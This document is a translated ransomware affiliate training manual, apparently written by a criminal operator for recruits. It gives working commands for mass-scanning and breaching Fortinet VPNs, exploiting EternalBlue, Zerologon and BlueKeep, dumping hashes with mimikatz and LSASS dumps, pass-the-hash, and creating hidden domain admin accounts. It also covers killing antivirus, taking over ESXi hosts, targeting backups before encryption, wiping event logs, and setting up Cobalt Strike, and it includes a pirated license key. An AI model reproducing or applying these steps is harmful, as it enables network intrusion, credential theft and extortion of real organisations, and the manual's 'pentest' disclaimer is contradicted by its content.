###### Bassterlord (FishEye) Networking Manual ----- ###### Foreward This manual is designed for beginners in the topic. But above all, for people who will work for me. All information will be presented in the form of a manual. There will be no meaningless explanations of how a certain exploit works and mountains of incomprehensible code, we will immediately apply it in practice. ----- ###### How to Deploy the Environment ----- ###### We need 1. Virtual Player is required (link) 2. VPN (link) — it is best to use this on the main machine (not on the virtual machine ) 3. Kali Linux torrent (link) 4. Any Windows 10 5. Nmap (link) 6. Mimikaz (link) 7. GMER (link) 8. Scanner (link) — Only use the paid on a virtual machine, do not put on pwned/broken (?пробитые) computers (there will be a free crack next to the archive) 9. Pysecdump (link) 10. Psexec (link) 11. Fortinet VPN (link) 12. Procdump (link) 13. PowerTool (will be in an archive next to the document) 14. Metasploit (link) 15. Bluekeep exploit for 3389 under Windows (located next to it in the archive) 16. IMPACKET «https://github.com/SecureAuthCorp/impacket» 17. Zerologon exploit (in the archive cve-2020-1472-exploit.py) 18. Fortinet exploit «https://github.com/7Elements/Fortigate» 19. Veracript (link) 20. Rent a server for $150 a month jabber bearhost@thesecure.biz 21. TOX for communication and correspondence (link) ----- ###### The final layout will look like this ###### Metasploit Mimikatz Psexec Procdump Pysecdump Fortinet VPN Scanner Powertool Gmer IMPACKET Zerologon exploit NMAP TOX Bluekeep exploit ###### Main machine Virtualbox Standard log and pass kali - kali Fortinet VPN deb IMPACKET ----- ###### Installing software in Kali Start the VM, enter login kali, password kali Copy the Fortinet VPN 123.deb in Kali to the home folder Open the console and type sudo dpkg -i 123.deb Enter the kali password and click enter (passwords in kali are not displayed in the console, you must enter it blindly) Next, input sudo git clone https://github.com/SecureAuthCorp/impacket cd impacket sudo python setup.py install If it requires a password, enter kali ----- ###### Installing software on a Windows virtual machine install everything according to the list from the screen with all the default settings. Install Python https://www.python.org/downloads/ Copy the impacket folder to the C:\ drive Open the command line in Windows as an administrator Enter commands: cd c:\impacket python setup.py install Copy the zerologon exploit in python to the impacket folder: cve-2020-1472-exploit.py Install everything else as default and copy the software to the desktop. ----- ##### Collecting material and how to get it ----- ###### For extracting material for work, go to the service http://masscan.online/ru Buy an account of your choice and scan the whole world for popular HTTPS ports, example below: After the scan is complete, download the results Go to Kali Open the console and type git clone https://github.com/7Elements/Fortigate cd Fortigate ``` pip3 install -r requirements.txt fortigate.py [-h] [-i INPUT] [-o OUTPUT] [-t THREADS] [-c CREDSCAN] fortigate.py -i текстовик с нашими айпи (text editor (?) with our IP) -O valid.txt -t 10 -c y Run and wait for output (?валид) ``` ----- ###### As a result we get something like This will be our material for work, copy our output to the VM with Windows and look at the next section. ----- ###### RANSOMWARE = Terrorism You will perform all your actions at your own peril and risk. However, the risk is for millions! I'm not promoting ransoms, it's just a pentest manual. ----- ##### Beginning of work/job ----- ###### First, go to the VM under Windows and Open Fortinet VPN client Configure VPN Click Configure VPN ----- ###### Next, enter the username and password vpna If the connection is successful, you will see ----- ###### Next, I recommend copying the cmd file route_print.cmd to the desktop from the archive and running it. Something like the following picture will appear. Pay attention to the interface and netmask: In this case, we see the range: 10.102.96.0 — 255.255.255.0 This means that you will register it in the scanner this way: 10.102.96.0 — 10.102.96.255 If you saw a picture like this: 10.102.0.0 — 255.255.0.0 Then in the scanner write: 10.102.0.0 — 10.102.255.255 ----- ###### If we see 0.0.0.0 — 0.0.0.0 0.0.0.0 — 0.0.0.0 from above 2 times So we scan the ranges of the network as in the example above if they are there, if they are not there and there are double lines with zeros then we take and scan the entire range. 192.168.0.0 — 192.168.255.255 Open the Softperfect scanner and enter the resulting ranges. Enter CTRL+O, the scanner settings will open, set everything as I have done in the screenshots: ----- ###### Click ОК ----- ###### Go to account settings. Here we will enter the logins and passwords from our VPN If you are using the paid version of the scanner then you will have a field integration with nmap ----- ###### Select(check) SMBEternalBlue and start scanning After the scan completes, we will see something like this: Our task is to sort the results by workgroup and TCP ports. And check for the presence of red C $ disks in pluses under the IP address column ----- ###### Also do not forget that if you have a paid version of the scanner, you'll need some alternative settings ----- ###### Ports and their correspondences with services General:135,137,139,445,8080,80,443 Nas synology port: 5000,5001 - Data store Veeam: 9443,9392,9393,9401,6160 - Backups DB mysql,mssql,db2,postgresql:3306,1433,50000,5432,5433 -Database Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server 3527,6106 - Backups Oracle: 1521,1522 Remote control: 22,21,3389 4899,5900 - Possibility of alternative connection to a computer Nfs: 111,1039,1047,1048,2049 Iscsi: 860,3260 replication: 902,31031,8123,8043,5480,5722 Sophos Web: 4444 Sophos Console: 2195,8190,8191,8192,8193,8194,49152-65535 In the far right column after the scan, we will see vulnerable devices for the Eternal Blue vulnerability (MS-17-010) . Next, we will look at the exploitation of this vulnerability in detail. ----- ###### MS-17-010 (Eternal Blue) To exploit the vulnerability, you will need Metasploit installed on a virtual machine. Open the CMD console in Windows Register msfconsole, press enter and wait for metasploit to load After loading metasploit, enter the commands one by one: setg LHOST (IP of our VPNA) ----- ###### setg RHOSTS (IP of our vulnerable devices, separated by a space) use exploi t/wi ndows/smb/ms17_010_psexec set payload payload/wi ndows/meterpreter/bi nd_tcp exploit The end result looks like this: Press enter and hope for success If successful, you will see this: In case of errors, ACCESS DENIED You can try to encrypt the antivirus payload using the commands below: ----- ###### set EnableStageEncodi ng true set StageEncoder x86/shi kata_ga_nai set encoder x86/shi kata_ga_nai set Exi tOnSessi on false set Sessi onCommuni cati onTi meout 0 exploit Next, we wait for the completion of the process and watch active sessions meterpreter-a The sessions command displays a list of computers by numbering that the exploit managed to break through In our case, we have 2 open sessions. Let's move on to the first command, sessions 1 Next, we enter the commands: getsystem load kiwi sysinfo – here we are interested in whether the computer is in the domain In this case, we see that yes, it is in the domain. ----- ###### Next, enter the hashdump command We get a list of user hashes, and copy them into a separate text editor. Next, enter creds_all — this command will try to get unencrypted passwords from the system ----- ###### We also copy them into a separate text document. If we have several sessions in the meter, then enter the bg command and repeat the above points starting with sessions, only now we enter sessions 2, etc. Let's not go through all the sessions yet. Next, without closing the console, go to the service https://www.crackmd5.ru/ and try to decrypt the hashes received. We have already obtained the open passwords of the accounts from the creds_all command. Put them into the scanner Settings => Account Management Enter accounts in the format Domain \ login password. After that, close the account control panel, select all IP addresses and rescan the network. ----- ###### Then we expand/open all of the "pluses" in the IP address column and review the rights received. We are interested in red local disks C$ If there are red disks everywhere in the domain, this means that we have received the administrator's domain on the network and we have rights to read and change data everywhere on the remote machine. ----- ###### If only on several machine, it means only the rights of local administrators and it is worth looking for other accounts. If we do not have open passwords but only hashes that could not be decrypted, we will consider the hash login vulnerabilities in the PASS THE HASH attacks section. If the open computer with the red C$ drive does not have port 3389, you can use the psexec tool, which we will go over in a separate section. Using the following parameters and comparing the IP sessions, it can be determined whether we accessed the server through the vulnerability. Or by the hostname in which the DC is present. For example WHDC.domain.local (the values can be anything, it's important for us to find out DC exactly) Then in the service session, you can execute the commands shell net group net group "Domain Admins" /domain This will help us find out the accounts of domain administrators and accordingly, is not cluttered with ordinary users and their accounts. The level "GOD" is important to us, right? :) ----- ### Zerologon ----- ###### To exploit the vulnerability, we need to scan the network and determine the DC - Domain Controller How to determine it is described on page 28 above We need to be connected to the network on which we operate, and also have Python installed on Windows Also, Impacket upacked on the C:\impacket path with the exploit cve-2020-1472-exploit.py already in it Also, put a .cmd file on the desktop with the following content: We will rewrite it and launch it for the purposes we need on the network. ----- ###### Делаем сортировку по аккаунтам пользователей и подставляем нужные нам значения до первой точки как на скриншоте ниже Save the Zerologon.cmd file and run it again, it all depends on whether the server is patched against this vulnerability or not. We repeat this action on all DCs in turn until we get a positive result: ----- ###### If the 'Performing authentication attempts' line takes more than 4 minutes or gives a negative result, go to the next DC or use other vulnerabilities if none of the DCs are vulnerable. Sometimes DCs do not impersonate themselves and it is necessary to scan all machines in the domain (workgroup) with this exploit, but this bears fruit. After a successful operation, go to Kali. Connect to the company's VPN ----- ###### Open the console and enter the following: cd impacket/examples **sudo python3 secretsdump.py -no-pass -just-dc AGLEADER/ag40server\$@192.168.16.27** ###### Press enter, it will ask to enter the password, enter 'kali' (it won't show up) and press enter Wait for the process of extracting accounts and hashes. Once it's complete, copy everything that the console provided. ----- ###### Next, go to the service https://www.crackmd5.ru/ Trying to decrypt the administrator hash (highlighted in yellow) **Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee:::** ###### If we decrypt the password, we boldly break into all computers with these creds, not forgetting to substitute an example for the working group: AGLEADER\Administrator and our password. If we do not receive the password we need to use the Pass The Hash attack. ----- #### Pass The Hash ----- ###### So we have hashes, but we could not get the password from the admin account. Return to Kali. If you closed the console, open it again input cd impacket/examples **sudo python3 smbexec.py -hashes** **aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee** **[Administrator@192.168.16.27](mailto:Administrator@192.168.16.27)** **or** **sudo python3 psexec.py -hashes** **aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee** **We substitute our data obtained from the Zerologon operation** **After execution we will get CMD on the remote DC machine – C:\Windows\system32>** **Next, enter the following commands:** **net user support Pa$$wo0rd /add** **net user support /active:yes** **net localgroup Administrators support /add** **If we break "High Profile" we can immediately create our own domain admin (?** **Original: Если ломимся по «Громкому» можем создать сразу своего домен админа )** **net group "Domain Admins" support /add** **After that, we get our account with domain administrator rights and, accordingly, we can** **break into all the machines on the domain using that account:** **support Pa$$wo0rd** **Next, go to the DC and remove the creds of the domain admin with mimikatz 64.exe or** **32.exe. Commands:** ----- #### AV Bypass ----- ###### Connect to the computer, and first look at the tray near the clock and the icons displayed. Look for AV. If simply Windows Defender is installed on the computer, go to the settings and add the C:\ drive to the exceptions. ----- ###### Usually antivirus without a password can stupidly be uninstalled through the uninstallation wizard in Windows. It is important if we see AV Sophos (blue) or Sentinel installed. on all machines, further work with this company will be meaningless. Other antivirus solutions can be easily killed through 2 tools: Gmer PowerTool If you can't kill AV, open the Windows registry follow the path: A computer\HKEY_LOCAL_MACHINE\SOFTWARE and look for folders with AV names Look at all the subfolders that are in the folder with AV, our goal is to find the folders and values inside them with the name 'Exclusions'. Suppose we found the value of the exceptions, let's say С:\users\admin\java.exe Rename malware to java.exe and throw it on this path, if there is no such path or folders on this machine, create 1-in-1 folders as indicated in the exceptions and try to run our file. In most cases, AV does not see this if it isn't too smart. :) If nothing comes out of the above, we stomp on all machines in the domain on port 3389 from the scanner and see if the AV is installed there. ----- ###### If AV is not installed on several machines, you can put a portable softperfect scanner there, scan the network from the inside, mount the disks and run our h*cker, sorry choked =D Ideally, you need to kill AV wherever possible and add C:\ drives to the exceptions And for computers that don't have port 3389, including NAS storages, mount and only then start lkh k yes what is that =D ----- # NAS and Backups ----- ###### The hardest part :) So we got access to the domain admin We scan the network from the inside We look at all ports Usually our storages hang on ports 5000,5001 and backups Veeam: 9443,9392,9393,9401,6160 Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server 3527,6106 or they will be signed in the hostname as NAS Usually, we hang out outside the domain, first of all we look at the scan if we now have access to them from a regular scan with the domain admin accounts ----- ###### However, if we are in the workgroup, you can break through all the domain administrators and try to log into them using creds without a domain from the pwned accounts. This is done through the web interface by opening the NAS IP through the browser and specifying the NAS port separated by a colon. In 40 % of cases, domain admin creds should be suitable. Log in as Admin with the same password, or try password from other domain admins, the probability of breaking through increases. Sometimes when scanning NAS through Softperfect, accounts are displayed that are active in the repository, usually this: Admin, backup, Sysadm, etc. If we opened the network through PASS THE HASH, look for these accounts in the results of the received hashes and get passwords from them through the hash cracking service. With veeam and other backups, the same thing. And the most important thing at the Hacker stage, we need to start with disks and computers where the most memory is from 500 gigs and more. Accordingly, the most important and the first will be "Big data" ----- ###### VС и ESXI ----- ###### This section will hold great and terrible for me (?): Boris Nikolaevich Yeltsin (Борис Николаевич Ельцин) Aka. https://xss.is/members/204378/ ----- ###### The trick is that you don't need to bypass the AV First you need to get creds from the vCenter 60% of the time it is in the domain and on AD creds Otherwise, the keylogger In my work, I often face the task of resetting the root password on esx. Let's imagine a situation where we have vCenter administrator credentials, there is a domain admin and the whole network is ready to fuck, but we couldn't catch the password under esx. Here's one of the ways. No reboot, without being too obvious (?) BUT I STRONGLY RECOMMEND RESETTING THE PASS IN THE NIGHT BEFORE THE OPEN NETWORK (?) That is, you reset the password and encrypt it right away. This method is consists of entering esx into the domain and then we will be able to log in using the credentials of the domain administrator. Then create a global ESX Admins group there, be sure to include our domain admin there. Then we return to vcenter Select the esx host, press configure - Authentication Service - Join domain Enter the domain in the format domain.local or domain.com, which domain can be found by entering systeminfo on the computer in the domain. Enter the login of the domain administrator without a domain and password. Now everything is ready for authorization, go to the esx host using the domain admin credentials and reset the root pass. Then you just go to esx via ssh Turn off the machine. And you do dirty deeds =) ----- ### PSEXEC ----- ###### In this section, we will look at the Psexec tool and how it will be useful in practice. First of all, it will help us run any file on all machines to which we have access. Suppose we have an exe file that we need to run Open CMD and drag psexec.exe there and then write the following text editor with IP addresses of the computers on which we run the file the account of the domain admin together with the domain password from domain admin the file to run text editor with IP addresses the account of the domain password from domain the file to run ###### If you removed all AVs, added exceptions and did everything right, this exe will run on all computers. If you need to run the file on behalf of the system, add the file.exe to the parameters -s -d -c Through Psexec, you can get and remove creds from remote computers if they do not have port 3389 but we have an account. Open the C$ folder through the scanner and drop pysecdump.exe and procdump.exe domain admin password remotely open a cmd on behalf of the system on a the IP of the machine we are going to take from the scanner and a red disk C$ the account of the domain admin together with the domain the account of the domain the IP of the machine we domain admin admin together with the ----- ###### So we got in the machine doing cd C:\ pysecdump.exe -s This command will give us the admin hashes on the remote computer, we are trying to break through the site or use PASS THE HASH in Kali or other machines. Next, we do reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\ WDigest /v UseLogonCredential /t REG_DWORD /d 1 procdump.exe --accepteula -ma lsass.exe lsass.dmp If successful, an lsass.dmp file will be created on the remote machine on the C:\ drive. Copy it to your computer next to mimikatz.exe We open mimikatz and do it in: sekurlsa::minidump lsass.dmp privilege::debug log 1234.txt sekurlsa::logonPasswords full It will also give us creds or hashes. Next, you can try to remotely enable the rdp port with the command reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Doesn't always work! After executing the command, it will be possible to be cut to the RDP Do not forget to delete all files and traces of work on the remote machine. ----- ###### After all the actions, if you want to wipe the traces of your stay to a minimum and postpone the break-in On the machines that you entered using RDP, you can open powershell and type the following: wevtutil el | Foreach-Object {wevtutil cl "$_"} This will erase all logs ("evidence"? literally translated as magazines) Also, commands for removing hidden accounts cmd net user support Pa$$wo0rd /delete net group "Domain Admins" support /delete ----- ----- # Cobalt Strike ----- # How I see all PPs Advert Do you know Cobalt? Speak! ###### Simply put, the above methods described by me completely exclude Cobalt, well, if people ask why not? Do you know Cobalt? Speak! ----- ###### In short, we rent a server for Linux Throw Cobalt there Type this in the console cd cs4.0 java -XX:ParallelGCThreads=4 - Dcobaltstrike.server_port=50050 - Djavax.net.ssl.keyStore=./cobaltstrike.store - Djavax.net.ssl.keyStorePassword=123456 -server -XX: +AggressiveHeap -XX:+UseParallelGC - javaagent:Hook.jar -classpath ./cobaltstrike.jar server.TeamServer IP SERVER 12345 Switch to my machine, I work from Windows in Cobalt For this, you must first install Java Run cobaltstrike.bat Enter the IP of our rented host account and the password that is specified in the config above. ----- ###### Go to this section. Create a listener. Next, create a payload. ----- ###### After clicking the Generate button, we will have an executable, push it to the DC and run it there. Next, we do: In the same place, select ----- ###### Then go to We select all the machines on the network and try to break into them using the admin hash. ----- ###### It is worth mentioning that machines do not always go to the general Internet. ----- ###### Then do We turn the infected computer into a local listener on which all machines in the area will knock =D There is no point in describing the rest of the functionality, since for me Cobalt is only suitable for conveniently removing creds and searching for creds from NAS. And so it's just bat guano that burns like a Christmas tree (?) with all that is possible and a crypt for this threshing floor costs fucking money and you still need a programmer who will rewrite the payload haha. ----- ## BLUEKEEP ----- ###### I'm donating a self-written exploit to you for 3389 All you need to do is add an IP from 3389 in a column without ports and run run.bat If you open run.bat through a text editor, you will see the creds of the hidden accounts that will be created on the computers pwned by the exploit. Гуды будут сохранены в отдельный текстовик. The exploit first tries to turn the remote machine into a blue screen and waits for them to reboot. After rebooting, it automatically executes the payload and we get a hidden account with admin rights on the vulnerable computer. ----- ###### This exp needs to be restarted 2-3 times, it does not always work as needed, this is due to the restart timings on remote machines. Well, now after we have buried the sellers of RDP accesses, you can proceed to the conclusion. ----- ###### Here is collected knowledge that will help you earn one way or another, this is all that I knew. The source of illustrations for this manual is taken from the Fish Eye Place Manual https://www.yuumeiart.com/ I do not argue that there are people smarter than me and with a much wider, vast store of knowledge, but as for me this is enough for a pentest of any network, be it Citrix, Cisco, Palo Alto, Pulse, Fortinet. Bonus license for Softperfect until 2022 **dUYiN30Q4+ydHwgPCwku3K** **+FYDomodEqW0bRGcTyxvdnlc7g4nne7cfwXOGPJbBVdPeqEs7jzX2yDiVxxiiNaCvNK4T7ML0Qfarren5vr** **MZEBcoOivf7QQ05BPxSG370cIus/AZxAuRAcibpckx1Ie+R4UTNiyBh6ZVcIwii+8M1lnRp+lcRmFqbgLGZ/** **cbzzh09IfaFKwoGJRPcTcnizxQtBJSk9sqlbNc6SwWeiQgl+0J+A1mrkrG3zd03vSjBUbc8daN08ebjOGYDsZVptkkhe5ASAJt/** **Uwzs0QCqO2issqS+QpE/atLV3lR63k/** **2G1y6yECKu7w+s1SV9aEKsxKhuBJplKLhbGoQIX7hGxDwww1HFLGqCZbAce1mz7aP6xqqltEgoM2oVvKv02tVUoLGYSHYtAGGoaksl** **XXu4+MLs26nLUoltIfIcOC1dOQsjChjXil8Im+dDOY+V1m5M0e2GckmBjTX4blWbz+hOmjl23n6f0jSndxT70Dd3Jl9** -----